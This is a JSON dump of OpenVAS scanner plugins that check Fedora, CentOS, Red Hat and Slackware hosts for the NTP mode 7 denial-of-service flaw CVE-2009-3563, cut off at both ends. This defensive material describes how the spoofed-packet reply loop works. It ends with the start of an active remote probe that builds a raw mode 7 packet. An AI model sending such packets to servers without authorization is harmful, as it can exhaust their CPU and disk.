of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nThis update fixes possible DoS with mode 7 packets. (CVE-2009-3563)\n\nChangeLog:\n\n* Wed Dec 9 2009 Miroslav Lichvar 4.2.4p8-1\n- update to 4.2.4p8 (#545557, CVE-2009-3563)\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update ntp' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-13046\";\ntag_summary = \"The remote host is missing an update to ntp\nannounced via advisory FEDORA-2009-13046.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66501\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-14 23:06:43 +0100 (Mon, 14 Dec 2009)\");\n script_cve_id(\"CVE-2009-3563\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_name(\"Fedora Core 12 FEDORA-2009-13046 (ntp)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=531213\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.4p8~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ntp-perl\", rpm:\"ntp-perl~4.2.4p8~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ntpdate\", rpm:\"ntpdate~4.2.4p8~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ntp-debuginfo\", rpm:\"ntp-debuginfo~4.2.4p8~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ntp-doc\", rpm:\"ntp-doc~4.2.4p8~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3563"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2011-08-09T00:00:00", "id": "OPENVAS:1361412562310880810", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880810", "type": "openvas", "title": "CentOS Update for ntp CESA-2009:1648 centos5 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for ntp CESA-2009:1648 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2009-December/016406.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880810\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_xref(name:\"CESA\", value:\"2009:1648\");\n script_cve_id(\"CVE-2009-3563\");\n script_name(\"CentOS Update for ntp CESA-2009:1648 centos5 i386\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ntp'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"ntp on CentOS 5\");\n script_tag(name:\"insight\", value:\"The Network Time Protocol (NTP) is used to synchronize a computer's time\n with a referenced time source.\n\n Robin Park and Dmitri Vinokurov discovered a flaw in the way ntpd handled\n certain malformed NTP packets. ntpd logged information about all such\n packets and replied with an NTP packet that was treated as malformed when\n received by another ntpd. A remote attacker could use this flaw to create\n an NTP packet reply loop between two ntpd servers via a malformed packet\n with a spoofed source IP address and port, causing ntpd on those servers to\n use excessive amounts of CPU time and fill disk space with log messages.\n (CVE-2009-3563)\n\n All ntp users are advised to upgrade to this updated package, which\n contains a backported patch to resolve this issue. After installing the\n update, the ntpd daemon will restart automatically.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.2p1~9.el5.centos.2.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2017-07-25T10:56:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3563"], "description": "The remote host is missing updates to ntp announced in\nadvisory CESA-2009:1648.", "modified": "2017-07-10T00:00:00", "published": "2009-12-14T00:00:00", "id": "OPENVAS:66527", "href": "http://plugins.openvas.org/nasl.php?oid=66527", "type": "openvas", "title": "CentOS Security Advisory CESA-2009:1648 (ntp)", "sourceData": "#CESA-2009:1648 66527 6\n# $Id: ovcesa2009_1648.nasl 6650 2017-07-10 11:43:12Z cfischer $\n# Description: Auto-generated from advisory CESA-2009:1648 (ntp)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"For details on the issues addressed in this update,\nplease visit the referenced security advisories.\";\ntag_solution = \"Update the appropriate packages on your system.\n\nhttp://www.securityspace.com/smysecure/catid.html?in=CESA-2009:1648\nhttp://www.securityspace.com/smysecure/catid.html?in=RHSA-2009:1648\nhttps://rhn.redhat.com/errata/RHSA-2009-1648.html\";\ntag_summary = \"The remote host is missing updates to ntp announced in\nadvisory CESA-2009:1648.\";\n\n\n\nif(description)\n{\n script_id(66527);\n script_version(\"$Revision: 6650 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:43:12 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-14 23:06:43 +0100 (Mon, 14 Dec 2009)\");\n script_cve_id(\"CVE-2009-3563\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_name(\"CentOS Security Advisory CESA-2009:1648 (ntp)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.0.a.20040617~8.el4_8.1\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.0.a.20040617~8.el4_8.2.centos\", rls:\"CentOS4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.2p1~9.el5.centos.2.1\", rls:\"CentOS5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3563"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2009-343-01.", "modified": "2019-03-15T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:136141256231066519", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066519", "type": "openvas", "title": "Slackware Advisory SSA:2009-343-01 ntp", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2009_343_01.nasl 14202 2019-03-15 09:16:15Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66519\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 10:16:15 +0100 (Fri, 15 Mar 2019) $\");\n script_cve_id(\"CVE-2009-3563\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_version(\"$Revision: 14202 $\");\n script_name(\"Slackware Advisory SSA:2009-343-01 ntp\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\", re:\"ssh/login/release=SLK(8\\.1|9\\.0|9\\.1|10\\.0|10\\.1|10\\.2|11\\.0|12\\.0|12\\.1|12\\.2|13\\.0)\");\n\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2009-343-01\");\n\n script_tag(name:\"insight\", value:\"New ntp packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1, 10.2,\n11.0, 12.0, 12.1, 12.2, 13.0, and -current to fix a security issue. If a\nspoofed mode 7 packet is sent to a vulnerable NTP daemon it may cause CPU\nand/or disk space exhaustion, resulting in a denial of service.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to the new package(s).\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update as announced\nvia advisory SSA:2009-343-01.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-slack.inc\");\n\nreport = \"\";\nres = \"\";\n\nif((res = isslkpkgvuln(pkg:\"ntp\", ver:\"4.2.2p3-i386-2_slack8.1\", rls:\"SLK8.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"ntp\", ver:\"4.2.2p3-i386-2_slack9.0\", rls:\"SLK9.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"ntp\", ver:\"4.2.2p3-i486-2_slack9.1\", rls:\"SLK9.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"ntp\", ver:\"4.2.2p3-i486-2_slack10.0\", rls:\"SLK10.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"ntp\", ver:\"4.2.2p3-i486-2_slack10.1\", rls:\"SLK10.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"ntp\", ver:\"4.2.2p3-i486-2_slack10.2\", rls:\"SLK10.2\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"ntp\", ver:\"4.2.2p3-i486-3_slack11.0\", rls:\"SLK11.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"ntp\", ver:\"4.2.4p8-i486-1_slack12.0\", rls:\"SLK12.0\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"ntp\", ver:\"4.2.4p8-i486-1_slack12.1\", rls:\"SLK12.1\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"ntp\", ver:\"4.2.4p8-i486-1_slack12.2\", rls:\"SLK12.2\")) != NULL) {\n report += res;\n}\nif((res = isslkpkgvuln(pkg:\"ntp\", ver:\"4.2.4p8-i486-1_slack13.0\", rls:\"SLK13.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2017-07-27T10:55:40", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3563"], "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:1648.\n\nThe Network Time Protocol (NTP) is used to synchronize a computer's time\nwith a referenced time source.\n\nRobin Park and Dmitri Vinokurov discovered a flaw in the way ntpd handled\ncertain malformed NTP packets. ntpd logged information about all such\npackets and replied with an NTP packet that was treated as malformed when\nreceived by another ntpd. A remote attacker could use this flaw to create\nan NTP packet reply loop between two ntpd servers via a malformed packet\nwith a spoofed source IP address and port, causing ntpd on those servers to\nuse excessive amounts of CPU time and fill disk space with log messages.\n(CVE-2009-3563)\n\nAll ntp users are advised to upgrade to this updated package, which\ncontains a backported patch to resolve this issue. After installing the\nupdate, the ntpd daemon will restart automatically.", "modified": "2017-07-12T00:00:00", "published": "2009-12-14T00:00:00", "id": "OPENVAS:66472", "href": "http://plugins.openvas.org/nasl.php?oid=66472", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:1648", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1648.nasl 6683 2017-07-12 09:41:57Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1648 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:1648.\n\nThe Network Time Protocol (NTP) is used to synchronize a computer's time\nwith a referenced time source.\n\nRobin Park and Dmitri Vinokurov discovered a flaw in the way ntpd handled\ncertain malformed NTP packets. ntpd logged information about all such\npackets and replied with an NTP packet that was treated as malformed when\nreceived by another ntpd. A remote attacker could use this flaw to create\nan NTP packet reply loop between two ntpd servers via a malformed packet\nwith a spoofed source IP address and port, causing ntpd on those servers to\nuse excessive amounts of CPU time and fill disk space with log messages.\n(CVE-2009-3563)\n\nAll ntp users are advised to upgrade to this updated package, which\ncontains a backported patch to resolve this issue. After installing the\nupdate, the ntpd daemon will restart automatically.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_id(66472);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-14 23:06:43 +0100 (Mon, 14 Dec 2009)\");\n script_cve_id(\"CVE-2009-3563\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_name(\"RedHat Security Advisory RHSA-2009:1648\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-1648.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#moderate\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.0.a.20040617~8.el4_8.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ntp-debuginfo\", rpm:\"ntp-debuginfo~4.2.0.a.20040617~8.el4_8.1\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.2p1~9.el5_4.1\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ntp-debuginfo\", rpm:\"ntp-debuginfo~4.2.2p1~9.el5_4.1\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3563"], "description": "The remote host is missing an update as announced\nvia advisory SSA:2009-343-01.", "modified": "2017-07-07T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:66519", "href": "http://plugins.openvas.org/nasl.php?oid=66519", "type": "openvas", "title": "Slackware Advisory SSA:2009-343-01 ntp ", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2009_343_01.nasl 6598 2017-07-07 09:36:44Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New ntp packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1, 10.2,\n11.0, 12.0, 12.1, 12.2, 13.0, and -current to fix a security issue. If a\nspoofed mode 7 packet is sent to a vulnerable NTP daemon it may cause CPU\nand/or disk space exhaustion, resulting in a denial of service.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2009-343-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2009-343-01\";\n \nif(description)\n{\n script_id(66519);\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:36:44 +0200 (Fri, 07 Jul 2017) $\");\n script_cve_id(\"CVE-2009-3563\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_version(\"$Revision: 6598 $\");\n script_name(\"Slackware Advisory SSA:2009-343-01 ntp \");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"ntp\", ver:\"4.2.2p3-i386-2_slack8.1\", rls:\"SLK8.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"ntp\", ver:\"4.2.2p3-i386-2_slack9.0\", rls:\"SLK9.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"ntp\", ver:\"4.2.2p3-i486-2_slack9.1\", rls:\"SLK9.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"ntp\", ver:\"4.2.2p3-i486-2_slack10.0\", rls:\"SLK10.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"ntp\", ver:\"4.2.2p3-i486-2_slack10.1\", rls:\"SLK10.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"ntp\", ver:\"4.2.2p3-i486-2_slack10.2\", rls:\"SLK10.2\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"ntp\", ver:\"4.2.2p3-i486-3_slack11.0\", rls:\"SLK11.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"ntp\", ver:\"4.2.4p8-i486-1_slack12.0\", rls:\"SLK12.0\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"ntp\", ver:\"4.2.4p8-i486-1_slack12.1\", rls:\"SLK12.1\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"ntp\", ver:\"4.2.4p8-i486-1_slack12.2\", rls:\"SLK12.2\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"ntp\", ver:\"4.2.4p8-i486-1_slack13.0\", rls:\"SLK13.0\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-09-25T13:27:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3563"], "description": "NTP.org", "modified": "2019-09-24T00:00:00", "published": "2009-12-15T00:00:00", "id": "OPENVAS:1361412562310100399", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100399", "type": "openvas", "title": "NTP mode 7 MODE_PRIVATE Packet Remote Denial of Service Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# NTP mode 7 MODE_PRIVATE Packet Remote Denial of Service Vulnerability\n#\n# Authors:\n# Michael Meyer\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.100399\");\n script_version(\"2019-09-24T10:41:39+0000\");\n script_bugtraq_id(37255);\n script_cve_id(\"CVE-2009-3563\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-09-24 10:41:39 +0000 (Tue, 24 Sep 2019)\");\n script_tag(name:\"creation_date\", value:\"2009-12-15 19:11:56 +0100 (Tue, 15 Dec 2009)\");\n script_name(\"NTP mode 7 MODE_PRIVATE Packet Remote Denial of Service Vulnerability\");\n script_category(ACT_ATTACK);\n script_family(\"Denial of Service\");\n script_copyright(\"This script is Copyright (C) 2009 Greenbone Networks GmbH\");\n script_dependencies(\"ntp_open.nasl\");\n script_require_udp_ports(\"Services/udp/ntp\", 123);\n script_mandatory_keys(\"ntp/remote/detected\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/37255\");\n script_xref(name:\"URL\", value:\"https://support.ntp.org/bugs/show_bug.cgi?id=1331\");\n script_xref(name:\"URL\", value:\"http://www.kb.cert.org/vuls/id/568372\");\n\n script_tag(name:\"solution\", value:\"Updates are available. Please see the references for details.\");\n\n script_tag(name:\"summary\", value:\"NTP.org's ntpd is prone to a remote denial-of-service vulnerability because it\n fails to properly handle certain incoming network packets.\");\n\n script_tag(name:\"impact\", value:\"An attacker can exploit this issue to cause the application to consume\n excessive CPU resources and fill disk space with log messages.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a NTP mode 7 request and check the response.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\n\nport = get_port_for_service(default:123, ipproto:\"udp\", proto:\"ntp\");\n\nsoc = open_sock_udp(port);\nif(!soc)\n exit(0);\n\ndata = raw_string(0x97, 0x00, 